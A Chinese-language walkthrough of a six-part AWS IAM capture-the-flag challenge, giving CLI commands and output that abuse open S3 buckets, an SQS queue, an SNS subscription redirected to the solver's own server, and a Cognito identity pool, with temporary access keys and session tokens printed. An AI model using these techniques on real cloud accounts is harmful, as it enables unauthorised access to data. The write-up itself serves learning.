Challenge 1: Buckets of Fun
We all know that public buckets are risky. But can you find the flag?
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-storage-9979f4b",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
}
}
}
]
}
IAM 策略 允许任何用户对指定的存储桶执行 GetObject 操作;允许任何用户对指定的存储桶执行 ListBucket 操作 访问带有前缀的列表对象 files/*
```
aws s3 ls s3://thebigiamchallenge-storage-9979f4b/files/
2023-06-05 19:13:53 37 flag1.txt
2023-06-08 19:18:24 81889 logo.png
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt flag.txt
download failed: s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt to ./flag.txt [Errno 30] Read-only fi
le system: '/var/task/flag.txt.c8AFe52B'
Completed 37 Bytes/37 Bytes (363 Bytes/s) with 1 file(s) remaining
aws s3 cp s3://thebigiamchallenge-storage-9979f4b/files/flag1.txt -
{wiz:exposed-storage-risky-as-usual}
```
我们在列取目录时发现,在 files 文件夹下存在 flag1.txt 尝试进行拷贝操作,发现只读权限,所以我们利用 在AWS S3命令行界面中,横杠(-)通常表示将命令的输出作为标准输出(stdout)。横杠后面没有指定目标路径,所以它的意义是将"flag1.txt"文件的内容输出到标准输出。
同时也可以利用 http://s3.amazonaws.com/thebigiamchallenge-storage-9979f4b/files/flag1.txt 直接访问获取
Flag: {wiz:exposed-storage-risky-as-usual}
Challenge 2: ~Google~ Analytics
We created our own analytics system specifically for this challenge. We think it's so good that we even used it on this page. What could go wrong?
Join our queue and get the secret flag.
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:SendMessage",
"sqs:ReceiveMessage"
],
"Resource": "arn:aws:sqs:us-east-1:092297851374:wiz-tbic-analytics-sqs-queue-ca7a1b2"
}
]
IAM 策略 允许任何用户 对 SQS(简单队列服务)的消息发送和接受操作
在这个示例中,策略的主体(Principal)是 "*", 这表示允许任何用户或角色执行这些操作。"Action" 列出了允许的操作,即SendMessage和ReceiveMessage,"Resource" 是指定的SQS队列的Amazon 资源名称(ARN)
所以我们通过尝试通过队列获取消息,访问从消息中获取到的 url
```
aws sqs receive-message --queue-url https://sqs.us-east-1.amazonaws.com/092297851374/wiz-tbic-analytics-sqs-queue-ca7a1b2
{
"Messages": [
{
"MessageId": "79a7c060-ce20-4456-8e90-cb7208fc1543",
"ReceiptHandle": "AQEBheZegXdRkxt2sPIljCj1pHEscNPlh0nhhcbAo3Q/0jm2Y69rahaoSBV5zBobVQDMy88nfXbHxk562PvNffXXYblya
foEzIkgvgXJJU8ImBUhRZsB1q8/RT8p/R/dM46ZqF3iwKedH1BnLkY1XUwnZLJlpf8+unI2aLb0NBEFsgGKH7cmA4dASmaaSSFqKA6tSZu3XxsCa61/HodU4OXf
2Kmyj+TrPruy3FLFXqd+8Fft2K9+ib8qBd0NOwAoDhLHYa1CZeAY/sJdU+ObDjTV3wYt+MdMS1U6SAqi2AXYqpekx5bHEFSqHSKyj+2YF7s4Wfl/uxgizGI6MBR
T79B6vJdEbvrdaIwcaZ3GE4MkJcpd+yib/Iek2Wpqdt9+CdFoFgkqrsT2/0cTjhR2zGKptcIN1t4x1Ec6WZBvMxashGA=",
"MD5OfBody": "4cb94e2bb71dbd5de6372f7eaea5c3fd",
"Body": "{\"URL\": \"https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html\", \"User-Agent
\": \"Lynx/2.5329.3258dev.35046 libwww-FM/2.14 SSL-MM/1.4.3714\", \"IsAdmin\": true}"
}
]
}
curl https://tbic-wiz-analytics-bucket-b44867f.s3.amazonaws.com/pAXCWLa6ql.html
{wiz:you-are-at-the-front-of-the-queue}
```
Flag: {wiz:you-are-at-the-front-of-the-queue}
Challenge 3: Enable Push Notifications
We got a message for you. Can you get it?
IAM Policy
{
"Version": "2008-10-17",
"Id": "Statement1",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications",
"Condition": {
"StringLike": {
"sns:Endpoint": "*@tbic.wiz.io"
}
}
}
]
}
IAM 策略 允许任何用户对订阅SNS(简单通知服务)主题的权限。
在这个示例中,策略的主体(Principal)是"*",它表示允许任何用户或角色执行订阅操作(SNS:Subscribe)。"Resource" 是指定的SNS主题的Amazon 资源名称(ARN)。同时,在"Condition" 部分使用了"StringLike"条件函数,用于对订阅的终端节点进行限制。此策略仅允许终端节点以"@tbic.wiz.io"邮箱后缀的形式。
aws sns subscribe --topic-arn \<主题ARN> --protocol \<协议> --notification-endpoint \<订阅者Endpoint>
可以通过 http 协议来获取,但是为了终端节点以"@tbic.wiz.io"邮箱后缀的形式 可以尝试利用 / 使得@tbic.wiz.io 变为一个请求的路由
```
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:092297851374:TBICWizPushNotifications --protocol http --notification-endpoint http://ip:port/@tbic.wiz.io
{
"SubscriptionArn": "pending confirmation"
}
```
监听自己服务器上的端口,可以获取到订阅信息
复制其中的订阅链接并访问,再次监听端口
在请求头中获得了 CTF 的值
Flag: {wiz:always-suspect-asterisks}
Challenge 4: Admin only?
We learned from our mistakes from the past. Now our bucket only allows access to one specific admin user. Or does it?
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:GetObject",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321/*"
},
{
"Effect": "Allow",
"Principal": "*",
"Action": "s3:ListBucket",
"Resource": "arn:aws:s3:::thebigiamchallenge-admin-storage-abf1321",
"Condition": {
"StringLike": {
"s3:prefix": "files/*"
},
"ForAllValues:StringLike": {
"aws:PrincipalArn": "arn:aws:iam::133713371337:user/admin"
}
}
}
]
}
IAM 策略 允许任何用户 对 thebigiamchallenge-admin-storage-abf1321 存储桶中的对象进行 s3:GetObject 操作
同时也允许任何用户 对 thebigiamchallenge-admin-storage-abf1321 存储桶中的对象进行 s3:ListBucket 操作
但是在 Condition 设置了限定条件必须满足
- 请求的 s3:prefix 必须以 files/ 作为前缀
- 请求的 aws:PrincipalArn 必须是 arn:aws:iam::133713371337:user/admin,即 admin IAM 用户
总结起来就是 只有当满足这两个条件时,才允许列出存储桶中以 files/ 为前缀的对象列表
一种利用方式就是 利用 --no-sign-request 禁止请求进行 AWS 签名验证
```
aws s3 ls s3://thebigiamchallenge-admin-storage-abf1321/files/ --no-sign-request
2023-06-07 19:15:43 42 flag-as-admin.txt
2023-06-08 19:20:01 81889 logo-admin.png
aws s3 cp s3://thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt - --no-sign-request
{wiz:principal-arn-is-not-what-you-think}
```
另一种利用方式是 创建一个 s3 的 url 来读取 flies 下的相关文件
```
curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321?prefix=files/"
<?xml version="1.0" encoding="UTF-8"?>
thebigiamchallenge-admin-storage-abf1321 files/ 1000 false files/flag-as-admin.txt 2023-0
6-07T19:15:43.000Z"e365cfa7365164c05d7a9c209c4d8514" 42 STANDARD files/logo-admin.png 2023-06-08T19:20:01.000Z "c57e95e6d6c138818bf38daac6216356" 81889 STANDARD curl "https://s3.amazonaws.com/thebigiamchallenge-admin-storage-abf1321/files/flag-as-admin.txt"
{wiz:principal-arn-is-not-what-you-think}
```
Flag: {wiz:principal-arn-is-not-what-you-think}
Challenge 5: Do I know you?
We configured AWS Cognito as our main identity provider. Let's hope we didn't make any mistakes.
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "VisualEditor0",
"Effect": "Allow",
"Action": [
"mobileanalytics:PutEvents",
"cognito-sync:*"
],
"Resource": "*"
},
{
"Sid": "VisualEditor1",
"Effect": "Allow",
"Action": [
"s3:GetObject",
"s3:ListBucket"
],
"Resource": [
"arn:aws:s3:::wiz-privatefiles",
"arn:aws:s3:::wiz-privatefiles/*"
]
}
]
}
IAM 策略 有两个 Statement,每个 Statement 包含 Effect、Action 和 Resource 字段
IAM 策略 VisualEditor0 允许对 所有资源进行 mobileanalytics:PutEvents (向MobileAnalytics服务发送事件数据) 和 cognito-sync:* (对Cognito Sync服务执行任何操作) 操作
IAM 策略 VisualEditor1 允许对 arn:aws:s3:::wiz-privatefiles/* 和 arn:aws:s3:::wiz-privatefiles/* 进行 s3:GetObject 和 s3:ListBucket 操作
通过前端页面获取到 IdentityPoolId
AWS.config.credentials = new AWS.CognitoIdentityCredentials({IdentityPoolId: "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"});
方法一 从检查控制台获取由 javascript 创建的临时凭证
AWS.config.credentials
$ aws configure set AWS_ACCESS_KEY_ID ASIARK7LBOHXL4L3B5CB
$ aws configure set AWS_SECRET_ACCESS_KEY Uxv+FKnQPZF1vwMlEbIht3bhNHpPFNYXxla3OCQv
$ aws configure set AWS_SESSION_TOKEN IQoJb3JpZ2luX2VjEOT//////////wEaCXVzLWVhc3QtMSJHMEUCIGwi0hScmjvtOFRBWJx5hdAeh6p9fxcxF+DtHyv+riM0AiEAgjiR+Iq4Qu1tKZP9el0+N4D6EzNovbImFf0qODif930q0gUIzf//////////ARAAGgwwOTIyOTc4NTEzNzQiDNf6fLCAIQzyMTHi+CqmBTuMUCvV20qPm1utDfPaFZMVd9si+YR06qmFHu9vVWDZ/a2o9AnoxQVF/Ya7heS1iNDOpIgZSfA6N1cl/lyz1lbRiqduZPLCHG1dEhV11NnBaQRGAHOKP0bEG3APGgDq268qSGS/DrVHkPWvKd0sKlrbUPkzFFtVqqFw296Xdp8OBO3sMc2UvkkBuqPuaQWQL8nxxxrUBi1rx7AQclEqd3szXOjNYz0SRU/0c69uOQP4gv3aub7YLdUsdRPhFqyWHgWBx9dbfB7UYa/5bQcO32rbZ4vz1/Iv9QMmQjTNw4HGe54SEZsx8VrPl/D18+r8HJu1F7SNF0kQKZvOzRx8HBypNo8/yKaR5zH2DAPtXYw9N1mx2zl8LCYDuDS0KYn7B+nJLH6nxFICWPEBvQ6bRLfo3ZGGwUpiYYHsrgu5vlhm5jnmJ3p6HQIrgev6de98k5KQ0LPYoQjx7AgQojsDhJttwOXYKstCUUZH53KdUVFUn016g3389daPHD2fSkYloJbyPjHNhSElJzM7NGegRiDpx5xdaFIl926mcGDKxkJQlhxc9uG72WmksEwU6KQHC+V3zAUvxC7qsJHIgBkLrXf2NgozVEnkeeRJPx8HcHJlCtW0NNEwWLFI9nYymgkYDNPlq4IsJ5pB8phR/GIufggXeOF4YLd6RI3irmwjcxBsuGmiYgJJB33VKTrTkHigW6ElqdREui61UQcf93Qa6vpgd5bOy9VzUJobjmsYbWiLVcG8wH/mYJgg7RCeadUGLgBqAgXwEWgWD8YEZcf3hgl8EBYXWb0CpD+8etzY4TZhPf4N/DwYDX47HXbj/e4Y3Jt6ySmeoyM3MLO5joM9nCH8PX/1IG8sVlfjHF8o11nj3H1ojiy4CZ7EI0Vk9o6sRFbsgsVbBTDdyqmoBjrdAvN7pbBwlsua6zkVC3HefcevE8lmk9MsV5FuS0Fk0SPeXN0IcUTCxMiSOz8VwAYDnylt+nMfrJeg8gUitmTUZK8OmyMmE0G6puAivEUaP9T/IcQYBFVAtBMqE0/doFvW+6uSTnVXKMD+nIpi6LsvLqMybxp4lkZGafzoeEDJnBoBvEHRLpTmHJrtaXuYCt46uZ2qXFqhXJ2N0gZB5zhHeGl6gMBRrNmkbswj8/8gZfp15cTb47IDo1M25kkwKgSW2RZbnwD1MpWu3tD1rIdc2U3TpfZ3oBK94Lno9MNbTM3ntVWv/i+mMmDCMfQ2HZVYDUgaoBjFsKwzKkDHWOa0EXn+itiQB405Qzf2okHEbANJIHIfkFlezp7XOzje7rr/fmq2WhAj6exbgwIPO7KEP96vwsmN89lmvJf6erCM9sUSfrS1ELRAxxzNOuzzeggrOghQPGgJIPRqOOIie10=
$ aws configure set AWS_DEFAULT_REGION us-east-1
$ aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"
}
$ aws s3 ls s3://wiz-privatefiles
2023-06-06 03:42:27 4220 cognito1.png
2023-06-05 21:28:35 37 flag1.txt
$ aws s3 cp s3://wiz-privatefiles/flag1.txt -
{wiz:incognito-is-always-suspicious}
方法二 使用身份池 ID,获取临时凭证来假装正在从该应用程序进行调用
```
aws cognito-identity get-id --identity-pool-id "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
{
"IdentityId": "us-east-1:6ae2709d-3e11-4e1f-b488-c056b5fe45c0"
}
aws cognito-identity get-credentials-for-identity --identity-id us-east-1:6ae2709d-3e11-4e1f-b488-c056b5fe45c0
{
"IdentityId": "us-east-1:6ae2709d-3e11-4e1f-b488-c056b5fe45c0",
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXJ5KGDX7Z",
"SecretKey": "ZhPgg7I37plkjgZk+iyGfokJYVoMGWLj20yEQXdL",
"SessionToken": "IQoJb3JpZ2luX2VjEOT//////////wEaCXVzLWVhc3QtMSJGMEQCIEAGIc4+Hfi9CsDeJnjAGSQnCw9tIySGArl7VM9D8vgDAiAqaXCjEI3wlmClB3W8AZtOUEqXBzzNv3uyo7+iJXyYLCrRBQjN//////////8BEAAaDDA5MjI5Nzg1MTM3NCIM2t6VezTbP+lm7860KqUF1D+A8tYeJwDB6GAETWjSwmkQKnMNl311vjjLZx0A6nw7wz+d9xT0j7YUJYw6x/fYVCwCwHfiClJWDvQUObJtjIybg1d7jHgkeNKtNJfuy1rk71YuOimJ/QCV1Yy
Yn50Sz5TS48iWrNAoOu1HNdpuDu1Y/q/5FnnSFiGgFZJ/5hefWEBlVwk9GmhLcMA3DI6nZl0+lgecWzppi76e0UyGmkg8CEYfaCHwN1QeWn9UZMDFdwdzL4PgoV1E+4+/CZ4bRC63xCYrN9Ihyhtun8Gy3L+gmGfayISlJbc/+QxEDng+7rJdC2xlOpB++r4KiedWj/d0Egdk9v0Sl/G4XLTaTakuQAjym+pzWurJ11N36VNVfowXt0XrSgB62rlMPdvXDkIObkVXTLhcb6svfSRff7VuyuRb1/wV3ddCKZ0kYKnzjTh6cGBBSes5MLAdChxwsoNJ+h24Fk1KRlQ8pbOfKfBrsHrqLmuJ12sP4cfaRXdkNkuOS1onUDCqPSBJ+sVWbNfWHJ2qen9bpXpbb63Ou7X2KdayIe0iCBtUxEQZQkiucT6A3KAlxR0dqLcqbBFdzqRw9eaZv9R2MeH9fcSoH9IbeS7wKE2MZpKOdUtg2KRCpczARvaE+ZOvkg6uT6kOBzT9XUpGb6WhgkkSXi1HmXuzfKAqkQeSswbzLTUhXtHDleiGy6O6FQPzTDuiy97+LXzs569hSWOHuYOuxLtXQ7tSif2xwbMgCK+Qcj966/N1IV8ml2ArDuUkdwmxoAjxtxlv3flwlQKxx3cHnuC6T0cEBOBP7Mlosxggdudqbfax5T0zd2Mc7F9+zBfC8vNTIIaDDnlYAAswcFd2UlWaETryMi7H+oEGpkFz57974lhLRflh0fWkYkHISlVyOntEVeg31e4w782pqAY63wIeHjZv6+3cZsFH55RW4gDPseMSSBORvIeJnwiaZTtbzPlO12ebx21Dlqh7afwjHva9l+XrG2NRhFEHI6kMA8bvYzcg7sa9EHf6LrtFsbGFMXzvU9RcOyFgoDTsEAn61U6AlH9+HGGHGDpIG7qz1gAwGS55GsDvD/YPsUBDLSK4ANjzY2+NxyfMvwkY12nRFw2/9qRRBa63nQ5e4Q6KMnRxa97SYXUZDxSBVlgHKOfFkwUHaO6ZOf7wMswZU15p+YNJ+zZ9Fl91jegoSAd5XfD7TG0qJEWqXNXO00e5/EmPfGKWI2Bol1ZozlQpTi91fl5xnUrun8PRdo/AUWCk9X3Hl1sduRvSFP+C9nmQCjQl0lwSW1xQbsdLgZ5vAAfib39unDCNTry01sjJVtwmHHpZKklZC59C+J1opJNhUycwqRA6Df/k8T3D0OfOK/KrNk4RfVjoMJkicwTocid2w38=",
"Expiration": 1695184127.0
}
}
```
$ aws configure set AWS_ACCESS_KEY_ID ASIARK7LBOHXJ5KGDX7Z
$ aws configure set AWS_SECRET_ACCESS_KEY ZhPgg7I37plkjgZk+iyGfokJYVoMGWLj20yEQXdL
$ aws configure set AWS_SESSION_TOKEN IQoJb3JpZ2luX2VjEOT//////////wEaCXVzLWVhc3QtMSJGMEQCIEAGIc4+Hfi9CsDeJnjAGSQnCw9tIySGArl7VM9D8vgDAiAqaXCjEI3wlmClB3W8AZtOUEqXBzzNv3uyo7+iJXyYLCrRBQjN//////////8BEAAaDDA5MjI5Nzg1MTM3NCIM2t6VezTbP+lm7860KqUF1D+A8tYeJwDB6GAETWjSwmkQKnMNl311vjjLZx0A6nw7wz+d9xT0j7YUJYw6x/fYVCwCwHfiClJWDvQUObJtjIybg1d7jHgkeNKtNJfuy1rk71YuOimJ/QCV1YyYn50Sz5TS48iWrNAoOu1HNdpuDu1Y/q/5FnnSFiGgFZJ/5hefWEBlVwk9GmhLcMA3DI6nZl0+lgecWzppi76e0UyGmkg8CEYfaCHwN1QeWn9UZMDFdwdzL4PgoV1E+4+/CZ4bRC63xCYrN9Ihyhtun8Gy3L+gmGfayISlJbc/+QxEDng+7rJdC2xlOpB++r4KiedWj/d0Egdk9v0Sl/G4XLTaTakuQAjym+pzWurJ11N36VNVfowXt0XrSgB62rlMPdvXDkIObkVXTLhcb6svfSRff7VuyuRb1/wV3ddCKZ0kYKnzjTh6cGBBSes5MLAdChxwsoNJ+h24Fk1KRlQ8pbOfKfBrsHrqLmuJ12sP4cfaRXdkNkuOS1onUDCqPSBJ+sVWbNfWHJ2qen9bpXpbb63Ou7X2KdayIe0iCBtUxEQZQkiucT6A3KAlxR0dqLcqbBFdzqRw9eaZv9R2MeH9fcSoH9IbeS7wKE2MZpKOdUtg2KRCpczARvaE+ZOvkg6uT6kOBzT9XUpGb6WhgkkSXi1HmXuzfKAqkQeSswbzLTUhXtHDleiGy6O6FQPzTDuiy97+LXzs569hSWOHuYOuxLtXQ7tSif2xwbMgCK+Qcj966/N1IV8ml2ArDuUkdwmxoAjxtxlv3flwlQKxx3cHnuC6T0cEBOBP7Mlosxggdudqbfax5T0zd2Mc7F9+zBfC8vNTIIaDDnlYAAswcFd2UlWaETryMi7H+oEGpkFz57974lhLRflh0fWkYkHISlVyOntEVeg31e4w782pqAY63wIeHjZv6+3cZsFH55RW4gDPseMSSBORvIeJnwiaZTtbzPlO12ebx21Dlqh7afwjHva9l+XrG2NRhFEHI6kMA8bvYzcg7sa9EHf6LrtFsbGFMXzvU9RcOyFgoDTsEAn61U6AlH9+HGGHGDpIG7qz1gAwGS55GsDvD/YPsUBDLSK4ANjzY2+NxyfMvwkY12nRFw2/9qRRBa63nQ5e4Q6KMnRxa97SYXUZDxSBVlgHKOfFkwUHaO6ZOf7wMswZU15p+YNJ+zZ9Fl91jegoSAd5XfD7TG0qJEWqXNXO00e5/EmPfGKWI2Bol1ZozlQpTi91fl5xnUrun8PRdo/AUWCk9X3Hl1sduRvSFP+C9nmQCjQl0lwSW1xQbsdLgZ5vAAfib39unDCNTry01sjJVtwmHHpZKklZC59C+J1opJNhUycwqRA6Df/k8T3D0OfOK/KrNk4RfVjoMJkicwTocid2w38=
$ aws configure set AWS_DEFAULT_REGION us-east-1
$ aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXJKAIRDRIU:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessUnauth_Role/CognitoIdentityCredentials"
}
$ aws s3 ls s3://wiz-privatefiles
2023-06-06 03:42:27 4220 cognito1.png
2023-06-05 21:28:35 37 flag1.txt
$ aws s3 cp s3://wiz-privatefiles/flag1.txt -
{wiz:incognito-is-always-suspicious}
Flag: {wiz:incognito-is-always-suspicious}
Challenge 6: One final push
Anonymous access no more. Let's see what can you do now.
Now try it with the authenticated role: arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role
IAM Policy
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "cognito-identity.amazonaws.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"cognito-identity.amazonaws.com:aud": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
}
}
]
}
IAM 策略示例是一个允许 Cognito 身份池 (Cognito Identity Pool) 使用 sts:AssumeRoleWithWebIdentity 操作的策略。这允许 Cognito 身份池使用 Web 身份验证委托者 (Web Identity Federated Providers) 进行身份验证,并以此委托者的身份扮演指定的角色。
以下是对策略示例中各个字段的解释:
Effect: 此字段指定了策略的生效效果,这里设置为 "Allow" 表示允许指定的操作。Principal: 此字段指定了允许执行操作的主体。在这里,主体是使用 Cognito 身份池身份验证的用户,表示为Federated:cognito-identity.amazonaws.com。这表示只有经过身份验证和授权的 Cognito 用户才能执行此操作。Action: 此字段指定了允许执行的操作,这里设置为sts:AssumeRoleWithWebIdentity,即允许 Cognito 身份池扮演具有 Web 身份验证委托者身份的角色。Condition: 此字段定义了一个条件,限制了通过 Cognito 身份池扮演角色的范围。在这里,限定条件是cognito-identity.amazonaws.com:aud,即要求 Web 身份验证委托者的 "aud" 值等于指定的 Cognito 身份池 ID。
```
aws cognito-identity get-id --region us-east-1 --identity-pool-id us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b
从池中获取身份 ID
{
"IdentityId": "us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8"
}
aws cognito-identity get-open-id-token --identity-id us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8
通过身份 ID 获取 Token
{
"IdentityId": "us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8",
"Token": "eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6ODUxY2I1MjQtMGMyMy00Y2ZiLWEwODEtODhmMzc4YTdmZmQ4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2OTUxOTIzMjMsImlhdCI6MTY5NTE5MTcyM30.KIgp8NVKXqfsnjHz71kIXjZHhmujj6pbypHf_I9YGelfSIozCeuEPxPHDUYg-t0klT-It9mJ3xQ49k3nsJPkBJj4NYR6FZn1u-d5pWcEK39VNI0Auk7E7WI4pX4IAEpXqm3fiwVHIPRGrkTTqzQDWwNdjyywkNWUaHp3ocoXucsNndsmUeTQxtn5QtuWowq2TRuKPJwch5y_IX_10hyLAexnkKZucHY8WgAug61zxImdWV21hvCrw6O6RuBrNzJ3f9W_zu3XGLPGC8pUauFTO_Rm5b6XAiQtUENHl6u08pTpMjJEjV28KDEDkHh2ZKzcOMEybktUuIU_qGwvdzEbgQ"
}
aws sts assume-role-with-web-identity --role-arn arn:aws:iam::092297851374:role/Cognito_s3accessAuth_Role --role-session-name CognitoIdentityCredentials --web-identity-token eyJraWQiOiJ1cy1lYXN0LTEzIiwidHlwIjoiSldTIiwiYWxnIjoiUlM1MTIifQ.eyJzdWIiOiJ1cy1lYXN0LTE6ODUxY2I1MjQtMGMyMy00Y2ZiLWEwODEtODhmMzc4YTdmZmQ4IiwiYXVkIjoidXMtZWFzdC0xOmI3M2NiMmQyLTBkMDAtNGU3Ny04ZTgwLWY5OWQ5YzEzZGEzYiIsImFtciI6WyJ1bmF1dGhlbnRpY2F0ZWQiXSwiaXNzIjoiaHR0cHM6Ly9jb2duaXRvLWlkZW50aXR5LmFtYXpvbmF3cy5jb20iLCJleHAiOjE2OTUxOTIzMjMsImlhdCI6MTY5NTE5MTcyM30.KIgp8NVKXqfsnjHz71kIXjZHhmujj6pbypHf_I9YGelfSIozCeuEPxPHDUYg-t0klT-It9mJ3xQ49k3nsJPkBJj4NYR6FZn1u-d5pWcEK39VNI0Auk7E7WI4pX4IAEpXqm3fiwVHIPRGrkTTqzQDWwNdjyywkNWUaHp3ocoXucsNndsmUeTQxtn5QtuWowq2TRuKPJwch5y_IX_10hyLAexnkKZucHY8WgAug61zxImdWV21hvCrw6O6RuBrNzJ3f9W_zu3XGLPGC8pUauFTO_Rm5b6XAiQtUENHl6u08pTpMjJEjV28KDEDkHh2ZKzcOMEybktUuIU_qGwvdzEbgQ
{
"Credentials": {
"AccessKeyId": "ASIARK7LBOHXALOA2IQL",
"SecretAccessKey": "txLLiE0UH6O4H7rIqwKH5/YBCUUpIApTv3O0RSYg",
"SessionToken": "FwoGZXIvYXdzEPj//////////wEaDAXw8R+mX0yneBT+DyKyAnoKN0cnvmC3wxifnKUANoQyUE940CiEToM2hAHUiv8Y0sphSnYnzzPD6iBYS8OIIu2pmPjjhUp7vYnuJMUMjTK6a4rScGPj6ycmyglntjP66FFLx2Y4K6o5g+varzqtqplYfCJux9kea2EiG3okcfCCFlfmZWiZRYlYRLJJt3U7WcIv9Jr8XI/kHuDEr8ObnNE3Jh+gxmxsd0WT/0e0CaHZGq2j8xdAiWgUQ6hnq/YRj9BxmBwX3cmTyHi5qYq1/aZ36q2iik7krDaZA9B8XgU8U1+vDjNC1FBfjUFK4C1j8plnjH6XkggyjPFRpFvWud575vMjl0CIjOmrku/io3aDlK17/Mp5mybrUwHUYxU8KNjEjI2Ovjqg+9WrmZzSEyfUFh4nNsBYmMJuNRB7W0hOyCjMpqqoBjKWAWDsNmMSyCbXAuFIiGe7NcKHdmMbofxUXHyRTJb//OJqzB5kkBKR8WDpSCgEknZAdK3j0ON47gO7B7Gmkh9lhB79LoSUnCJ9ISAtmWHHgBUvt1Etg4CAvkHLOcO+ey+z+4om98iuc7fkulmRa5wXpoawxI7wwtm+bd30PtahAUj5CxUSmI/35j+d/IdCAE8mMeSGerl8Lw==",
"Expiration": "2023-09-20T07:38:04Z"
},
"SubjectFromWebIdentityToken": "us-east-1:851cb524-0c23-4cfb-a081-88f378a7ffd8",
"AssumedRoleUser": {
"AssumedRoleId": "AROARK7LBOHXASFTNOIZG:CognitoIdentityCredentials",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/CognitoIdentityCredentials"
},
"Provider": "cognito-identity.amazonaws.com",
"Audience": "us-east-1:b73cb2d2-0d00-4e77-8e80-f99d9c13da3b"
}
```
$ aws configure set AWS_ACCESS_KEY_ID ASIARK7LBOHXALOA2IQL
$ aws configure set AWS_SECRET_ACCESS_KEY txLLiE0UH6O4H7rIqwKH5/YBCUUpIApTv3O0RSYg
$ aws configure set AWS_SESSION_TOKEN FwoGZXIvYXdzEPj//////////wEaDAXw8R+mX0yneBT+DyKyAnoKN0cnvmC3wxifnKUANoQyUE940CiEToM2hAHUiv8Y0sphSnYnzzPD6iBYS8OIIu2pmPjjhUp7vYnuJMUMjTK6a4rScGPj6ycmyglntjP66FFLx2Y4K6o5g+varzqtqplYfCJux9kea2EiG3okcfCCFlfmZWiZRYlYRLJJt3U7WcIv9Jr8XI/kHuDEr8ObnNE3Jh+gxmxsd0WT/0e0CaHZGq2j8xdAiWgUQ6hnq/YRj9BxmBwX3cmTyHi5qYq1/aZ36q2iik7krDaZA9B8XgU8U1+vDjNC1FBfjUFK4C1j8plnjH6XkggyjPFRpFvWud575vMjl0CIjOmrku/io3aDlK17/Mp5mybrUwHUYxU8KNjEjI2Ovjqg+9WrmZzSEyfUFh4nNsBYmMJuNRB7W0hOyCjMpqqoBjKWAWDsNmMSyCbXAuFIiGe7NcKHdmMbofxUXHyRTJb//OJqzB5kkBKR8WDpSCgEknZAdK3j0ON47gO7B7Gmkh9lhB79LoSUnCJ9ISAtmWHHgBUvt1Etg4CAvkHLOcO+ey+z+4om98iuc7fkulmRa5wXpoawxI7wwtm+bd30PtahAUj5CxUSmI/35j+d/IdCAE8mMeSGerl8Lw==
$ aws configure set AWS_DEFAULT_REGION us-east-1
$ aws sts get-caller-identity
{
"UserId": "AROARK7LBOHXASFTNOIZG:CognitoIdentityCredentials",
"Account": "092297851374",
"Arn": "arn:aws:sts::092297851374:assumed-role/Cognito_s3accessAuth_Role/CognitoIdentityCredentials"
}
$ aws s3 ls
2023-06-05 01:07:29 tbic-wiz-analytics-bucket-b44867f
2023-06-05 21:07:44 thebigiamchallenge-admin-storage-abf1321
2023-06-05 00:31:02 thebigiamchallenge-storage-9979f4b
2023-06-05 21:28:31 wiz-privatefiles
2023-06-05 21:28:31 wiz-privatefiles-x1000
$ aws s3 ls wiz-privatefiles-x1000
2023-06-06 03:42:27 4220 cognito2.png
2023-06-05 21:28:35 40 flag2.txt
$ aws s3 cp s3://wiz-privatefiles-x1000/flag2.txt -
{wiz:open-sesame-or-shell-i-say-openid}
Flag: {wiz:open-sesame-or-shell-i-say-openid}
参考文章
https://infrasec.sh/post/iam_ctf/
https://iash.dev/posts/the-big-iam-challenge-ctf-walkthrough/
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论